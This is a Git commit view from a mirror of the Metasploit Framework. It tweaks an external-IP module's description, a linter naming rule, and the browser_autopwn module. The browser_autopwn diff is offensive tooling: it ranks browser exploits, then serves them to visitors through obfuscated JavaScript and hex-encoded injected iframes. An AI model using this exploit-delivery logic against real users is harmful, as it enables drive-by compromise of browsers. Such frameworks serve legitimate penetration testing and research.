infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge branch 'master' of https://github.com/rapid7/metasploit-framework

bug/bundler_fix
jvazquez-r7 2013-03-21 09:07:41 +01:00
parent 189abdc650 011b6899b0
commit b30a5aa6e8
3 changed files with 74 additions and 85 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

9
modules/auxiliary/gather/external_ip.rb
View File

@ -17,8 +17,13 @@ class Metasploit3 < Msf::Auxiliary
def initialize
super(
'Name' => 'External IP',
'Description' => 'This module checks for the public source IP address of the current route to the RHOST',
'Name' => 'Discover External IP via Ifconfig.me',
'Description' => %q{
This module checks for the public source IP address of the current
route to the RHOST by querying the public web application at ifconfig.me.
It should be noted this module will register activity on ifconfig.me,
which is not affiliated with Metasploit.
},
'Author' => ['RageLtMan'],
'License' => MSF_LICENSE,
'References' =>

58
modules/auxiliary/server/browser_autopwn.rb
View File

@ -385,8 +385,8 @@ class Metasploit3 < Msf::Auxiliary
def start_exploit_modules()
@lhost = (datastore['LHOST'] || "0.0.0.0")
@js_tests = {}
@noscript_tests = {}
@all_tests = {}
print_line
print_status("Starting exploit modules on host #{@lhost}...")
@ -446,20 +446,24 @@ class Metasploit3 < Msf::Auxiliary
end
# Now that we've got all of our exploit tests put together,
# organize them into requires-scripting and
# doesnt-require-scripting, sorted by browser name.
# organize them into an all tests (JS and no-JS), organized by rank,
# and doesnt-require-scripting (no-JS), organized by browser name.
if apo[:javascript] && apo[:ua_name]
@js_tests[apo[:ua_name]] ||= []
@js_tests[apo[:ua_name]].push(apo)
@all_tests[apo[:rank]] ||= []
@all_tests[apo[:rank]].push(apo)
elsif apo[:javascript]
@js_tests["generic"] ||= []
@js_tests["generic"].push(apo)
@all_tests[apo[:rank]] ||= []
@all_tests[apo[:rank]].push(apo)
elsif apo[:ua_name]
@noscript_tests[apo[:ua_name]] ||= []
@noscript_tests[apo[:ua_name]].push(apo)
@all_tests[apo[:rank]] ||= []
@all_tests[apo[:rank]].push(apo)
else
@noscript_tests["generic"] ||= []
@noscript_tests["generic"].push(apo)
@all_tests[apo[:rank]] ||= []
@all_tests[apo[:rank]].push(apo)
end
end
@ -501,9 +505,8 @@ class Metasploit3 < Msf::Auxiliary
print_line
# Sort the tests by reliability, descending.
@js_tests.each { |browser,tests|
tests.sort! {|a,b| b[:rank] <=> a[:rank]}
}
# I don't like doing this directly (wihout a !), but any other sort wasn't sticking - NE
@all_tests = @all_tests.sort.reverse
# This matters a lot less for noscript exploits since they basically
# get thrown into a big pile of iframes that the browser will load
@ -511,7 +514,6 @@ class Metasploit3 < Msf::Auxiliary
@noscript_tests.each { |browser,tests|
tests.sort! {|a,b| b[:rank] <=> a[:rank]}
}
end
#
@ -746,7 +748,10 @@ class Metasploit3 < Msf::Auxiliary
# if we have no client_info, this will add all tests. Otherwise tries
# to only send tests for exploits that target the client's detected
# browser.
@js_tests.each { |browser, sploits|
@all_tests.each { |rank, sploits|
sploits.each { |s|
browser = s[:ua_name] || "generic"
next unless client_matches_browser(client_info, browser)
# Send all the generics regardless of what the client is. If the
@ -754,8 +759,8 @@ class Metasploit3 < Msf::Auxiliary
# on the side of shells and send everything. Otherwise, send only
# if the client is using the browser associated with this set of
# exploits.
if s[:javascript]
if (browser == "generic" || client_info.nil? || [nil, browser].include?(client_info[:ua_name]))
sploits.each do |s|
if s[:vuln_test].nil? or s[:vuln_test].empty?
test = "is_vuln = true"
else
@ -777,6 +782,7 @@ class Metasploit3 < Msf::Auxiliary
end
end
end
js << "global_exploit_list[global_exploit_list.length] = {\n"
js << " 'test':'#{test}',\n"
js << " 'resource':'#{res}'\n"
@ -784,17 +790,7 @@ class Metasploit3 < Msf::Auxiliary
sploits_for_this_client.push s[:name]
sploit_cnt += 1
end
end
}
# Add a javaEnabled() test specifically for java exploits. Other
# exploits that don't require javascript go into a big pile of iframes
# that will be dumped out after other exploitation is done, assuming
# the browser didn't stop somewhere along the way due to a successful
# exploit or a crash from all the memory raping we just did.
noscript_html = ""
@noscript_tests.each { |browser, sploits|
sploits.each do |s|
else
if s[:name] =~ %r|/java_|
res = exploit_resource(s[:name]).gsub("\n",'').gsub("'", "\\\\'")
js << "global_exploit_list[global_exploit_list.length] = {\n"
@ -810,18 +806,7 @@ class Metasploit3 < Msf::Auxiliary
sploit_cnt += 1
end
}
# If all of our exploits that require javascript fail, try to continue
# with those that don't
js << %Q|var noscript_exploits = "|
js << Rex::Text.to_hex(noscript_html, "%")
js << %Q|";\n|
js << %Q|var noscript_div = document.createElement("div");\n|
# Have to use innerHTML here to render the new iframes. Using
# document.createElement and appendChild() will escape all the
# entities.
js << %Q|noscript_div.innerHTML = unescape(noscript_exploits);\n|
js << %Q|document.body.appendChild(noscript_div);\n|
}
js << "#{js_debug("'starting exploits (' + global_exploit_list.length + ' total)<br>'")}\n"
js << "window.next_exploit(0);\n"
@ -830,7 +815,6 @@ class Metasploit3 < Msf::Auxiliary
js.obfuscate unless datastore["DEBUG"]
response.body = "#{js}"
print_status("Responding with #{sploit_cnt} exploits")
sploits_for_this_client.each do |name|
vprint_status("* #{name}")

2
tools/msftidy.rb
View File

@ -277,7 +277,7 @@ class Msftidy
if @source =~ /'Name'[[:space:]]*=>[[:space:]]*['"](.+)['"],*$/
words = $1.split
words.each do |word|
if %w{and or the for to in of as with a an on at}.include?(word)
if %w{and or the for to in of as with a an on at via}.include?(word)
next
elsif %w{pbot}.include?(word)
elsif word =~ /^[a-z]+$/